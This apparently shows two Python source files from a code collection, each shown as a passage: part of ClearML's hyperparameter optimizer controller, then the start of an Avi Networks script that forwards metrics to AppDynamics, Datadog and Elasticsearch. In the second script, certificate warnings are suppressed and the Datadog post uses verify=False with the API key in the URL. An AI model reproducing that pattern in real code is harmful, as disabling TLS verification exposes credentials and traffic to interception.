optimizer_class=RandomSearch, # type: type(SearchStrategy)
max_number_of_concurrent_tasks=10, # type: int
execution_queue='default', # type: str
optimization_time_limit=None, # type: Optional[float]
compute_time_limit=None, # type: Optional[float]
auto_connect_task=True, # type: Union[bool, Task]
always_create_task=False, # type: bool
spawn_project=None, # type: Optional[str]
save_top_k_tasks_only=None, # type: Optional[int]
**optimizer_kwargs # type: Any
):
# type: (...) -> ()
"""
Create a new hyper-parameter controller. The newly created object will launch and monitor the new experiments.
:param str base_task_id: The Task ID to be used as template experiment to optimize.
:param list hyper_parameters: The list of Parameter objects to optimize over.
:param str objective_metric_title: The Objective metric title to maximize / minimize (for example,
``validation``).
:param str objective_metric_series: The Objective metric series to maximize / minimize (for example, ``loss``).
:param str objective_metric_sign: The objective to maximize / minimize.
The values are:
- ``min`` - Minimize the last reported value for the specified title/series scalar.
- ``max`` - Maximize the last reported value for the specified title/series scalar.
- ``min_global`` - Minimize the min value of *all* reported values for the specific title/series scalar.
- ``max_global`` - Maximize the max value of *all* reported values for the specific title/series scalar.
:param class.SearchStrategy optimizer_class: The SearchStrategy optimizer to use for the hyper-parameter search
:param int max_number_of_concurrent_tasks: The maximum number of concurrent Tasks (experiments) running at the
same time.
:param str execution_queue: The execution queue to use for launching Tasks (experiments).
:param float optimization_time_limit: The maximum time (minutes) for the entire optimization process. The
default is ``None``, indicating no time limit.
:param float compute_time_limit: The maximum compute time in minutes. When time limit is exceeded,
all jobs aborted. (Optional)
:param bool auto_connect_task: Store optimization arguments and configuration in the Task
The values are:
- ``True`` - The optimization argument and configuration will be stored in the Task. All arguments will
be under the hyper-parameter section ``opt``, and the optimization hyper_parameters space will be
stored in the Task configuration object section.
- ``False`` - Do not store with Task.
- ``Task`` - A specific Task object to connect the optimization process with.
:param bool always_create_task: Always create a new Task
The values are:
- ``True`` - No current Task initialized. Create a new task named ``optimization`` in the ``base_task_id``
project.
- ``False`` - Use the :py:meth:`task.Task.current_task` (if exists) to report statistics.
:param str spawn_project: If project name is specified, create all optimization Jobs (Tasks) in the
specified project instead of the original base_task_id project.
:param int save_top_k_tasks_only: If specified and above 0, keep only the top_k performing Tasks,
and archive the rest of the created Tasks. Default: -1 (keep everything; nothing will be archived).
:param ** optimizer_kwargs: Arguments passed directly to the optimizer constructor.
Example:
.. code-block:: py
:linenos:
:caption: Example
from clearml import Task
from clearml.automation import UniformParameterRange, DiscreteParameterRange
from clearml.automation import GridSearch, RandomSearch, HyperParameterOptimizer
task = Task.init('examples', 'HyperParameterOptimizer example')
an_optimizer = HyperParameterOptimizer(
base_task_id='fa30fa45d95d4927b87c323b5b04dc44',
hyper_parameters=[
UniformParameterRange('lr', min_value=0.01, max_value=0.3, step_size=0.05),
DiscreteParameterRange('network', values=['ResNet18', 'ResNet50', 'ResNet101']),
],
objective_metric_title='title',
objective_metric_series='series',
objective_metric_sign='min',
max_number_of_concurrent_tasks=5,
optimizer_class=RandomSearch,
execution_queue='workers', time_limit_per_job=120, pool_period_min=0.2)
# This will automatically create and print the optimizer's new task id
# for later use. If a Task was already created, it will use it.
an_optimizer.set_time_limit(in_minutes=10.)
an_optimizer.start()
# we can create a polling loop if we like
while not an_optimizer.reached_time_limit():
top_exp = an_optimizer.get_top_experiments(top_k=3)
print(top_exp)
# wait until optimization completed or timed-out
an_optimizer.wait()
# make sure we stop all jobs
an_optimizer.stop()
"""
# create a new Task, if we do not have one already
self._task = auto_connect_task if isinstance(auto_connect_task, Task) else Task.current_task()
if not self._task and always_create_task:
base_task = Task.get_task(task_id=base_task_id)
self._task = Task.init(
project_name=base_task.get_project_name(),
task_name='Optimizing: {}'.format(base_task.name),
task_type=Task.TaskTypes.optimizer,
)
opts = dict(
base_task_id=base_task_id,
objective_metric_title=objective_metric_title,
objective_metric_series=objective_metric_series,
objective_metric_sign=objective_metric_sign,
max_number_of_concurrent_tasks=max_number_of_concurrent_tasks,
execution_queue=execution_queue,
optimization_time_limit=optimization_time_limit,
compute_time_limit=compute_time_limit,
optimizer_kwargs=optimizer_kwargs)
# make sure all the created tasks are our children, as we are creating them
if self._task:
self._task.add_tags([self._tag])
if auto_connect_task:
optimizer_class, hyper_parameters, opts = self._connect_args(
optimizer_class=optimizer_class, hyper_param_configuration=hyper_parameters, **opts)
self.base_task_id = opts['base_task_id']
self.hyper_parameters = hyper_parameters
self.max_number_of_concurrent_tasks = opts['max_number_of_concurrent_tasks']
self.execution_queue = opts['execution_queue']
self.objective_metric = Objective(
title=opts['objective_metric_title'], series=opts['objective_metric_series'],
order='min' if opts['objective_metric_sign'] in ('min', 'min_global') else 'max',
extremum=opts['objective_metric_sign'].endswith('_global'))
# if optimizer_class is an instance, use it as is.
if type(optimizer_class) != type:
self.optimizer = optimizer_class
else:
self.optimizer = optimizer_class(
base_task_id=opts['base_task_id'], hyper_parameters=hyper_parameters,
objective_metric=self.objective_metric, execution_queue=opts['execution_queue'],
num_concurrent_workers=opts['max_number_of_concurrent_tasks'],
compute_time_limit=opts['compute_time_limit'], **opts.get('optimizer_kwargs', {}))
self.optimizer.set_optimizer_task(self._task)
self.optimization_timeout = None
self.optimization_start_time = None
self._thread = None
self._stop_event = None
self._report_period_min = 5.
self._thread_reporter = None
self._experiment_completed_cb = None
self._save_top_k_tasks_only = max(0, save_top_k_tasks_only or 0)
self.optimizer.set_job_default_parent(
self._task.id if self._task else None, project_name=spawn_project or None)
self.set_time_limit(in_minutes=opts['optimization_time_limit'])
def get_num_active_experiments(self):
# type: () -> int
"""
Return the number of current active experiments.
:return: The number of active experiments.
"""
if not self.optimizer:
return 0
return len(self.optimizer.get_running_jobs())
def get_active_experiments(self):
# type: () -> Sequence[Task]
"""
Return a list of Tasks of the current active experiments.
:return: A list of Task objects, representing the current active experiments.
"""
if not self.optimizer:
return []
return [j.task for j in self.optimizer.get_running_jobs()]
def start(self, job_complete_callback=None):
# type: (Optional[Callable[[str, float, int, dict, str], None]]) -> bool
"""
Start the HyperParameterOptimizer controller. If the calling process is stopped, then the controller stops
as well.
:param Callable job_complete_callback: Callback function, called when a job is completed.
.. code-block:: py
def job_complete_callback(
job_id, # type: str
objective_value, # type: float
objective_iteration, # type: int
job_parameters, # type: dict
top_performance_job_id # type: str
):
pass
:return: True, if the controller started. False, if the controller did not start.
"""
if not self.optimizer:
return False
if self._thread:
return True
self.optimization_start_time = time()
self._experiment_completed_cb = job_complete_callback
self._stop_event = Event()
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
self._thread_reporter = Thread(target=self._report_daemon)
self._thread_reporter.daemon = True
self._thread_reporter.start()
return True
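# Illustrative sketch of registering a completion callback when starting the controller
# (the callback name below is a placeholder; the signature follows the docstring above):
#
#     def my_job_complete_callback(job_id, objective_value, objective_iteration,
#                                  job_parameters, top_performance_job_id):
#         print('job {} finished, objective={}'.format(job_id, objective_value))
#
#     an_optimizer.start(job_complete_callback=my_job_complete_callback)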
def stop(self, timeout=None, wait_for_reporter=True):
# type: (Optional[float], Optional[bool]) -> ()
"""
Stop the HyperParameterOptimizer controller and the optimization thread.
:param float timeout: Wait timeout for the optimization thread to exit (minutes).
The default is ``None``, indicating do not wait; terminate immediately.
:param wait_for_reporter: Wait for reporter to flush data.
"""
if not self._thread or not self._stop_event or not self.optimizer:
if self._thread_reporter and wait_for_reporter:
self._thread_reporter.join()
return
_thread = self._thread
self._stop_event.set()
self.optimizer.stop()
# wait for optimizer thread
if timeout is not None:
_thread.join(timeout=timeout * 60.)
# stop all running tasks:
for j in self.optimizer.get_running_jobs():
j.abort()
# clear thread
self._thread = None
if wait_for_reporter:
# wait for reporter to flush
self._thread_reporter.join()
def is_active(self):
# type: () -> bool
"""
Is the optimization procedure active (still running)
The values are:
- ``True`` - The optimization procedure is active (still running).
- ``False`` - The optimization procedure is not active (not still running).
.. note::
If the daemon thread has not yet started, ``is_active`` returns ``True``.
:return: A boolean indicating whether the optimization procedure is active (still running) or stopped.
"""
return self._stop_event is None or self._thread is not None
def is_running(self):
# type: () -> bool
"""
Is the optimization controller running
The values are:
- ``True`` - The optimization procedure is running.
- ``False`` - The optimization procedure is not running.
:return: A boolean indicating whether the optimization procedure is active (still running) or stopped.
"""
return self._thread is not None
def wait(self, timeout=None):
# type: (Optional[float]) -> bool
"""
Wait for the optimizer to finish.
.. note::
This method does not stop the optimizer. Call :meth:`stop` to terminate the optimizer.
:param float timeout: The timeout to wait for the optimization to complete (minutes).
If ``None``, wait until the timeout is reached or the optimization is completed.
:return: True, if the optimization finished. False, if the optimization timed out.
"""
if not self.is_running():
return True
if timeout is not None:
timeout *= 60.
else:
timeout = max(0, self.optimization_timeout - self.optimization_start_time) \
if self.optimization_timeout else None
_thread = self._thread
_thread.join(timeout=timeout)
if _thread.is_alive():
return False
return True
def set_time_limit(self, in_minutes=None, specific_time=None):
# type: (Optional[float], Optional[datetime]) -> ()
"""
Set a time limit for the HyperParameterOptimizer controller. When the time limit is reached, the optimization
process is stopped. If ``specific_time`` is provided, use it; otherwise, use ``in_minutes``.
:param float in_minutes: The maximum processing time from current time (minutes).
:param datetime specific_time: The specific date/time limit.
"""
if specific_time:
self.optimization_timeout = specific_time.timestamp()
else:
self.optimization_timeout = (float(in_minutes) * 60.) + time() if in_minutes else None
def get_time_limit(self):
# type: () -> datetime
"""
Return the controller optimization time limit.
:return: The absolute datetime limit of the controller optimization process.
"""
return datetime.fromtimestamp(self.optimization_timeout)
def elapsed(self):
# type: () -> float
"""
Return the minutes elapsed since the controller start time stamp.
:return: The minutes from controller start time. A negative value means the process has not started yet.
"""
if self.optimization_start_time is None:
return -1.0
return (time() - self.optimization_start_time) / 60.
def reached_time_limit(self):
# type: () -> bool
"""
Did the optimizer reach the time limit
The values are:
- ``True`` - The time limit passed.
- ``False`` - The time limit did not pass.
This method returns immediately; it does not wait for the optimizer.
:return: True, if optimizer is running and we passed the time limit, otherwise returns False.
"""
if self.optimization_start_time is None:
return False
if not self.is_running():
return False
return bool(self.optimization_timeout) and time() > self.optimization_timeout
def get_top_experiments(self, top_k):
# type: (int) -> Sequence[Task]
"""
Return a list of Tasks of the top performing experiments, based on the controller ``Objective`` object.
:param int top_k: The number of Tasks (experiments) to return.
:return: A list of Task objects, ordered by performance, where index 0 is the best performing Task.
"""
if not self.optimizer:
return []
return self.optimizer.get_top_experiments(top_k=top_k)
def get_optimizer(self):
# type: () -> SearchStrategy
"""
Return the currently used optimizer object.
:return: The SearchStrategy object used.
"""
return self.optimizer
def set_default_job_class(self, job_class):
# type: (ClearmlJob) -> ()
"""
Set the Job class to use when the optimizer spawns new Jobs.
:param ClearmlJob job_class: The Job Class type.
"""
self.optimizer.set_job_class(job_class)
def set_report_period(self, report_period_minutes):
# type: (float) -> ()
"""
Set reporting period for the accumulated objective report (minutes). This report is sent on the Optimizer Task,
and collects the Objective metric from all running jobs.
:param float report_period_minutes: The reporting period (minutes). The default is once every 10 minutes.
"""
self._report_period_min = float(report_period_minutes)
@classmethod
def get_optimizer_top_experiments(
cls,
objective_metric_title, # type: str
objective_metric_series, # type: str
objective_metric_sign, # type: str
optimizer_task_id, # type: str
top_k, # type: int
):
# type: (...) -> Sequence[Task]
"""
Return a list of Tasks of the top performing experiments
for a specific HyperParameter Optimization session (i.e. Task ID), based on the title/series objective.
:param str objective_metric_title: The Objective metric title to maximize / minimize (for example,
``validation``).
:param str objective_metric_series: The Objective metric series to maximize / minimize (for example, ``loss``).
:param str objective_metric_sign: The objective to maximize / minimize.
The values are:
- ``min`` - Minimize the last reported value for the specified title/series scalar.
- ``max`` - Maximize the last reported value for the specified title/series scalar.
- ``min_global`` - Minimize the min value of *all* reported values for the specific title/series scalar.
- ``max_global`` - Maximize the max value of *all* reported values for the specific title/series scalar.
:param str optimizer_task_id: Parent optimizer Task ID
:param top_k: The number of Tasks (experiments) to return.
:return: A list of Task objects, ordered by performance, where index 0 is the best performing Task.
"""
objective = Objective(
title=objective_metric_title, series=objective_metric_series, order=objective_metric_sign)
return objective.get_top_tasks(top_k=top_k, optimizer_task_id=optimizer_task_id)
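# Illustrative usage sketch (the optimizer Task ID below is a placeholder):
#
#     top_tasks = HyperParameterOptimizer.get_optimizer_top_experiments(
#         objective_metric_title='title', objective_metric_series='series',
#         objective_metric_sign='min', optimizer_task_id='<optimizer-task-id>', top_k=3)
#     for t in top_tasks:
#         print(t.id, t.name)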
def _connect_args(self, optimizer_class=None, hyper_param_configuration=None, **kwargs):
# type: (SearchStrategy, dict, Any) -> (SearchStrategy, list, dict)
if not self._task:
logger.warning('Auto Connect turned on but no Task was found, '
'hyper-parameter optimization argument logging disabled')
return optimizer_class, hyper_param_configuration, kwargs
configuration_dict = {'parameter_optimization_space': [c.to_dict() for c in hyper_param_configuration]}
self._task.connect_configuration(configuration_dict)
# this is the conversion back magic:
configuration_dict = {'parameter_optimization_space': [
Parameter.from_dict(c) for c in configuration_dict['parameter_optimization_space']]}
complex_optimizer_kwargs = None
if 'optimizer_kwargs' in kwargs:
# do not store complex optimizer kwargs:
optimizer_kwargs = kwargs.pop('optimizer_kwargs', {})
complex_optimizer_kwargs = {
k: v for k, v in optimizer_kwargs.items()
if not isinstance(v, six.string_types + six.integer_types +
(six.text_type, float, list, tuple, dict, type(None)))}
kwargs['optimizer_kwargs'] = {
k: v for k, v in optimizer_kwargs.items() if k not in complex_optimizer_kwargs}
# skip non basic types:
arguments = {'opt': kwargs}
if type(optimizer_class) != type:
logger.warning('Auto Connect optimizer_class disabled, {} is already instantiated'.format(optimizer_class))
self._task.connect(arguments)
else:
arguments['opt']['optimizer_class'] = str(optimizer_class).split('.')[-1][:-2] \
if not isinstance(optimizer_class, str) else optimizer_class
self._task.connect(arguments)
# this is the conversion back magic:
original_class = optimizer_class
optimizer_class = arguments['opt'].pop('optimizer_class', None)
if optimizer_class == 'RandomSearch':
optimizer_class = RandomSearch
elif optimizer_class == 'GridSearch':
optimizer_class = GridSearch
elif optimizer_class == 'OptimizerBOHB':
from .hpbandster import OptimizerBOHB
optimizer_class = OptimizerBOHB
elif optimizer_class == 'OptimizerOptuna':
from .optuna import OptimizerOptuna
optimizer_class = OptimizerOptuna
else:
logger.warning("Could not resolve optimizer_class {} reverting to original class {}".format(
optimizer_class, original_class))
optimizer_class = original_class
if complex_optimizer_kwargs:
if 'optimizer_kwargs' not in arguments['opt']:
arguments['opt']['optimizer_kwargs'] = complex_optimizer_kwargs
else:
arguments['opt']['optimizer_kwargs'].update(complex_optimizer_kwargs)
return optimizer_class, configuration_dict['parameter_optimization_space'], arguments['opt']
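# Note: connecting the arguments and the parameter space to the Task is what allows a cloned copy of this
# optimizer Task to be re-executed with edited values; the "conversion back" steps above re-create the
# Parameter objects and resolve the optimizer class name from the (possibly overridden) values returned by
# connect() / connect_configuration().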
def _daemon(self):
# type: () -> ()
"""
Implement the main polling thread, calling the optimizer loop every ``self.pool_period_minutes`` minutes.
"""
self.optimizer.start()
self._thread = None
def _report_daemon(self):
# type: () -> ()
title, series = self.objective_metric.get_objective_metric()
title = '{}/{}'.format(title, series)
counter = 0
completed_jobs = dict()
task_logger = None
cur_completed_jobs = set()
cur_task = self._task or Task.current_task()
if cur_task and self.optimizer:
# noinspection PyProtectedMember
child_tasks = self.optimizer._get_child_tasks(
parent_task_id=cur_task.id, status=['completed', 'stopped'])
hyper_parameters = [h.name for h in self.hyper_parameters]
for task in child_tasks:
params = {k: v for k, v in task.get_parameters().items() if k in hyper_parameters}
params["status"] = str(task.status)
# noinspection PyProtectedMember
iteration_value = task.get_last_iteration()
objective = self.objective_metric.get_objective(task)
completed_jobs[task.id] = (
objective if objective is not None else -1,
iteration_value if iteration_value is not None else -1,
params
)
while self._thread is not None:
timeout = self.optimization_timeout - time() if self.optimization_timeout else 0.
if timeout >= 0:
timeout = min(self._report_period_min * 60., timeout if timeout else self._report_period_min * 60.)
# make sure that we have the first report fired before we actually go to sleep, wait for 15 sec.
if counter <= 0:
timeout = 15
print('Progress report #{} completed, sleeping for {} minutes'.format(counter, timeout / 60.))
if self._stop_event.wait(timeout=timeout):
# wait for one last report
timeout = -1
counter += 1
# get task to report on.
cur_task = self._task or Task.current_task()
if cur_task:
task_logger = cur_task.get_logger()
# do some reporting
self._report_remaining_budget(task_logger, counter)
if self.optimizer.budget.compute_time.used and self.optimizer.budget.compute_time.used >= 1.0:
# Reached compute time limit
timeout = -1
self._report_resources(task_logger, counter)
# collect a summary of all the jobs and their final objective values
cur_completed_jobs = set(self.optimizer.get_created_jobs_ids().keys()) - \
{j.task_id() for j in self.optimizer.get_running_jobs()}
self._report_completed_status(completed_jobs, cur_completed_jobs, task_logger, title)
self._report_completed_tasks_best_results(set(completed_jobs.keys()), task_logger, title, counter)
self._auto_archive_low_performance_tasks(completed_jobs)
# if we should leave, stop everything now.
if timeout < 0:
# we should leave
self.stop(wait_for_reporter=False)
return
if task_logger and counter:
counter += 1
self._report_remaining_budget(task_logger, counter)
self._report_resources(task_logger, counter)
self._report_completed_status(completed_jobs, cur_completed_jobs, task_logger, title, force=True)
self._report_completed_tasks_best_results(set(completed_jobs.keys()), task_logger, title, counter)
self._auto_archive_low_performance_tasks(completed_jobs)
def _report_completed_status(self, completed_jobs, cur_completed_jobs, task_logger, title, force=False):
job_ids_sorted_by_objective = self.__sort_jobs_by_objective(completed_jobs)
best_experiment = \
(self.objective_metric.get_normalized_objective(job_ids_sorted_by_objective[0]),
job_ids_sorted_by_objective[0]) \
if job_ids_sorted_by_objective else (float('-inf'), None)
if force or cur_completed_jobs != set(completed_jobs.keys()):
pairs = []
labels = []
created_jobs = copy(self.optimizer.get_created_jobs_ids())
created_jobs_tasks = self.optimizer.get_created_jobs_tasks()
id_status = {j_id: j_run.status() for j_id, j_run in created_jobs_tasks.items()}
for i, (job_id, params) in enumerate(created_jobs.items()):
value = self.objective_metric.get_objective(job_id)
if job_id in completed_jobs:
if value != completed_jobs[job_id][0]:
iteration_value = self.objective_metric.get_current_raw_objective(job_id)
completed_jobs[job_id] = (
value,
iteration_value[0] if iteration_value else -1,
copy(dict(**params, **{"status": id_status.get(job_id)}))) # noqa
elif completed_jobs.get(job_id):
completed_jobs[job_id] = (completed_jobs[job_id][0],
completed_jobs[job_id][1],
copy(dict(**params, **{"status": id_status.get(job_id)}))) # noqa
pairs.append((i, completed_jobs[job_id][0]))
labels.append(str(completed_jobs[job_id][2])[1:-1])
elif value is not None:
pairs.append((i, value))
labels.append(str(params)[1:-1])
iteration_value = self.objective_metric.get_current_raw_objective(job_id)
completed_jobs[job_id] = (
value,
iteration_value[0] if iteration_value else -1,
copy(dict(**params, **{"status": id_status.get(job_id)}))) # noqa
# callback new experiment completed
if self._experiment_completed_cb:
normalized_value = self.objective_metric.get_normalized_objective(job_id)
if normalized_value is not None and normalized_value > best_experiment[0]:
best_experiment = normalized_value, job_id
c = completed_jobs[job_id]
self._experiment_completed_cb(job_id, c[0], c[1], c[2], best_experiment[1])
if pairs:
print('Updating job performance summary plot/table')
# update scatter plot
task_logger.report_scatter2d(
title='Optimization Objective', series=title,
scatter=pairs, iteration=0, labels=labels,
mode='markers', xaxis='job #', yaxis='objective')
# update summary table
job_ids = list(completed_jobs.keys())
job_ids_sorted_by_objective = sorted(
job_ids, key=lambda x: completed_jobs[x][0], reverse=bool(self.objective_metric.sign >= 0))
# sort the columns except for 'objective', 'iteration'
columns = list(sorted(set([c for k, v in completed_jobs.items() for c in v[2].keys()])))
# add the index column (task id) and the first two columns 'objective', 'iteration' then the rest
table_values = [['task id', 'objective', 'iteration'] + columns]
table_values += \
[([job, completed_jobs[job][0], completed_jobs[job][1]] +
[completed_jobs[job][2].get(c, '') for c in columns]) for job in job_ids_sorted_by_objective]
# create links for task id in the table
task_link_template = self._task.get_output_log_web_page() \
.replace('/{}/'.format(self._task.project), '/{project}/') \
.replace('/{}/'.format(self._task.id), '/{task}/')
# create links for task id in the table
table_values_with_links = deepcopy(table_values)
for i in range(1, len(table_values_with_links)):
task_id = table_values_with_links[i][0]
project_id = created_jobs_tasks[task_id].task.project \
if task_id in created_jobs_tasks else '*'
table_values_with_links[i][0] = '<a href="{}"> {} </a>'.format(
task_link_template.format(project=project_id, task=task_id), task_id)
task_logger.report_table(
"summary", "job", 0, table_plot=table_values_with_links,
extra_layout={"title": "objective: {}".format(title)})
# Build parallel Coordinates: convert to columns, and reorder accordingly
if len(table_values) > 1:
table_values_columns = [[row[i] for row in table_values] for i in range(len(table_values[0]))]
table_values_columns = \
[[table_values_columns[0][0]] + [c[:6]+'...' for c in table_values_columns[0][1:]]] + \
table_values_columns[2:-1] + [[title]+table_values_columns[1][1:]]
pcc_dims = []
for col in table_values_columns:
# test if all values are numbers:
try:
# try to cast all values to float
values = [float(v) for v in col[1:]]
d = dict(label=col[0], values=values)
except (ValueError, TypeError):
values = list(range(len(col[1:])))
ticks = col[1:]
d = dict(label=col[0], values=values, tickvals=values, ticktext=ticks)
pcc_dims.append(d)
# report parallel coordinates
plotly_pcc = dict(
data=[dict(
type='parcoords',
line=dict(colorscale='Viridis',
reversescale=bool(self.objective_metric.sign >= 0),
color=table_values_columns[-1][1:]),
dimensions=pcc_dims)],
layout={})
task_logger.report_plotly(
title='Parallel Coordinates', series='',
iteration=0, figure=plotly_pcc)
# upload summary as artifact
if force:
task = self._task or Task.current_task()
if task:
task.upload_artifact(name='summary', artifact_object={'table': table_values})
def _report_remaining_budget(self, task_logger, counter):
# noinspection PyBroadException
try:
budget = self.optimizer.budget.to_dict()
except Exception:
budget = {}
# report remaining budget
for budget_part, value in budget.items():
task_logger.report_scalar(
title='remaining budget', series='{} %'.format(budget_part),
iteration=counter, value=round(100 - value['used'] * 100., ndigits=1))
if self.optimization_timeout and self.optimization_start_time:
task_logger.report_scalar(
title='remaining budget', series='time %',
iteration=counter,
value=round(100 - (100. * (time() - self.optimization_start_time) /
(self.optimization_timeout - self.optimization_start_time)), ndigits=1)
)
def _report_completed_tasks_best_results(self, completed_jobs, task_logger, title, counter):
# type: (Set[str], Logger, str, int) -> ()
if not completed_jobs:
return
value_func, series_name = (max, "max") if self.objective_metric.get_objective_sign() > 0 else \
(min, "min")
latest_completed, obj_values = self._get_latest_completed_task_value(completed_jobs, series_name)
if latest_completed:
val = value_func(obj_values)
task_logger.report_scalar(
title=title,
series=series_name,
iteration=counter,
value=val)
task_logger.report_scalar(
title=title,
series="last reported",
iteration=counter,
value=latest_completed)
def _report_resources(self, task_logger, iteration):
# type: (Logger, int) -> ()
self._report_active_workers(task_logger, iteration)
self._report_tasks_status(task_logger, iteration)
def _report_active_workers(self, task_logger, iteration):
# type: (Logger, int) -> ()
res = self.__get_session().send(workers_service.GetAllRequest())
response = res.wait()
if response.ok():
all_workers = response
queue_workers = len(
[
worker.get("id")
for worker in all_workers.response_data.get("workers")
for q in worker.get("queues")
if q.get("name") == self.execution_queue
]
)
task_logger.report_scalar(title="resources",
series="queue workers",
iteration=iteration,
value=queue_workers)
def _report_tasks_status(self, task_logger, iteration):
# type: (Logger, int) -> ()
tasks_status = {"running tasks": 0, "pending tasks": 0}
for job in self.optimizer.get_running_jobs():
if job.is_running():
tasks_status["running tasks"] += 1
else:
tasks_status["pending tasks"] += 1
for series, val in tasks_status.items():
task_logger.report_scalar(
title="resources", series=series,
iteration=iteration, value=val)
def _get_latest_completed_task_value(self, cur_completed_jobs, series_name):
# type: (Set[str], str) -> (float, List[float])
completed_value = None
latest_completed = None
obj_values = []
cur_task = self._task or Task.current_task()
for j in cur_completed_jobs:
res = cur_task.send(tasks_service.GetByIdRequest(task=j))
response = res.wait()
if not response.ok() or response.response_data["task"].get("status") != Task.TaskStatusEnum.completed:
continue
completed_time = datetime.strptime(response.response_data["task"]["completed"].partition("+")[0],
"%Y-%m-%dT%H:%M:%S.%f")
completed_time = completed_time.timestamp()
completed_values = self._get_last_value(response)
obj_values.append(completed_values['max_value'] if series_name == "max" else completed_values['min_value'])
if not latest_completed or completed_time > latest_completed:
latest_completed = completed_time
completed_value = completed_values['value']
return completed_value, obj_values
def _get_last_value(self, response):
metrics, title, series, values = ClearmlJob.get_metric_req_params(self.objective_metric.title,
self.objective_metric.series)
last_values = response.response_data["task"]['last_metrics'][title][series]
return last_values
def _auto_archive_low_performance_tasks(self, completed_jobs):
if self._save_top_k_tasks_only <= 0:
return
# sort based on performance
job_ids_sorted_by_objective = self.__sort_jobs_by_objective(completed_jobs)
# query system_tags only
res = self.__get_session().send(tasks_service.GetAllRequest(
id=job_ids_sorted_by_objective, status=['completed', 'stopped'], only_fields=['id', 'system_tags']))
response = res.wait()
if not response.ok():
return
tasks_system_tags_lookup = {
task.get("id"): task.get("system_tags") for task in response.response_data.get("tasks")}
for i, task_id in enumerate(job_ids_sorted_by_objective):
system_tags = tasks_system_tags_lookup.get(task_id, [])
if i < self._save_top_k_tasks_only and Task.archived_tag in system_tags:
print('Restoring from archive Task id={} (#{} objective={})'.format(
task_id, i, completed_jobs[task_id][0]))
# top_k task and is archived, remove archive tag
system_tags = list(set(system_tags) - {Task.archived_tag})
res = self.__get_session().send(
tasks_service.EditRequest(task=task_id, system_tags=system_tags, force=True))
res.wait()
elif i >= self._save_top_k_tasks_only and Task.archived_tag not in system_tags:
print('Archiving Task id={} (#{} objective={})'.format(
task_id, i, completed_jobs[task_id][0]))
# Not in top_k task and not archived, add archive tag
system_tags = list(set(system_tags) | {Task.archived_tag})
res = self.__get_session().send(
tasks_service.EditRequest(task=task_id, system_tags=system_tags, force=True))
res.wait()
def __get_session(self):
cur_task = self._task or Task.current_task()
if cur_task:
return cur_task.default_session
# noinspection PyProtectedMember
return Task._get_default_session()
def __sort_jobs_by_objective(self, completed_jobs):
if not completed_jobs:
return []
job_ids_sorted_by_objective = list(sorted(
completed_jobs.keys(), key=lambda x: completed_jobs[x][0], reverse=bool(self.objective_metric.sign >= 0)))
return job_ids_sorted_by_objective
metricscollection.py
#!/opt/local/bin/python3
version = 'v2019-12-20'
#########################################################################################
# #
# #
# #
# REQUIREMENTS: #
# 1. python 3.6+ #
# 2. python3 requests #
# 3. python3 yaml                                                                       #
# #
# #
# #
# #
# @author: Matthew Karnowski (mkarnowski@avinetworks.com) #
# #
# #
# #
#########################################################################################
#########################################################################################
#----- Import Libraries
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import json
import yaml
import time
import syslog
import socket
from multiprocessing import Process
from datetime import datetime
import base64
import logging
import traceback
import sys
import os
import _pickle as pickle
from requests.auth import HTTPBasicAuth
#---------------------------------------------------------------
#--------------- Metrics Endpoint functions Begin --------------
#---------------------------------------------------------------
#----- Send value to appdynamics
def send_value_appdynamics_machine(endpoint_info, appd_payload):
try:
for entry in appd_payload:
if 'name_space' in entry:
name_space = entry['name_space'].replace('||','|')
#----- used for migration from old script
if 'host_location' in entry and 'host_environment' in entry:
name_space = name_space.replace('avi.', 'avi.'+entry['host_location']+'.'+entry['host_environment']+'.')
print('name=Custom Metrics|%s,value=%d,aggregator=OBSERVATION,time-rollup=CURRENT,cluster-rollup=INDIVIDUAL' % (name_space, int(entry['metric_value'])))
except:
exception_text = traceback.format_exc()
print(str(datetime.now())+' '+exception_text)
#----- this is to send to appdynamics machine agent http listener
def send_value_appdynamics_http(endpoint_info, appd_payload):
try:
payload = []
for entry in appd_payload:
if 'name_space' in entry:
name_space = entry['name_space'].replace('||','|')
#----- used for migration from old script
if 'host_location' in entry and 'host_environment' in entry:
name_space = name_space.replace('avi.', 'avi.'+entry['host_location']+'.'+entry['host_environment']+'.')
temp_payload = {}
temp_payload['metricName'] = 'Custom Metrics|'+name_space
temp_payload['aggregatorType'] = 'OBSERVATION'
temp_payload['value'] = int(entry['metric_value'])
payload.append(temp_payload)
if len(payload) > 0:
headers = ({'content-type': 'application/json'})
resp = requests.post('http://%s:%s/api/v1/metrics' %(endpoint_info['server'],endpoint_info['server_port']),headers = headers, data=json.dumps(payload), timeout=15)
if resp.status_code != 204:
print(resp)
#if resp.status_code != 202:
# print resp
except:
exception_text = traceback.format_exc()
print(exception_text)
#----- Send value to datadog
def send_value_datadog(endpoint_info, datadog_payload):
try:
keys_to_remove=["avicontroller","timestamp","metric_value","metric_name","name_space"]
series_list = []
datadog_payload_template = {
"metric":"",
"points":"",
"host":"",
"tags":""
}
for entry in datadog_payload:
temp_payload = datadog_payload_template.copy()
temp_payload['metric'] = entry['metric_name']
temp_payload['points'] = [[entry['timestamp'],entry['metric_value']]]
temp_payload['host'] = entry['avicontroller']
#for k in keys_to_remove:
# entry.pop(k, None)
tag_list = []
for e in entry:
if e not in keys_to_remove:
tag_list.append(str(e+':'+entry[e]))
temp_payload['tags'] = tag_list
series_list.append(temp_payload)
payload = {'series': series_list}
headers = ({'content-type': 'application/json'})
resp = requests.post('https://%s%s' %(endpoint_info['api_url'],endpoint_info['api_key']), verify=False, headers = headers, data=json.dumps(payload), timeout=15)
if resp.status_code != 202:
print(resp)
except:
exception_text = traceback.format_exc()
print(exception_text)
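# For reference, each series entry posted above has roughly the following shape (values are
# illustrative; the actual tags depend on the remaining keys of each metric entry):
#   {"metric": "l4_client.avg_bandwidth",
#    "points": [[1576800000, 123.0]],
#    "host": "avi-cluster-name",
#    "tags": ["tenant:admin", "vs_name:my-vs"]}
# and the list is wrapped as {"series": [...]} before being POSTed to the Datadog API.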
#----- Send value to elasticsearch
def send_value_elasticsearch(endpoint_info, payload):
try:
keys_to_remove = ['name_space']
for entry in payload:
for k in keys_to_remove:
entry.pop(k,None)
entry[endpoint_info['timestamp']] = time.strftime("%Y-%m-%dT%H:%M:%S", time.localtime())
entry['metric_value'] = float(entry['metric_value'])
headers = ({'content-type': 'application/json'})
if str(endpoint_info['auth-enabled']).lower() == 'true':
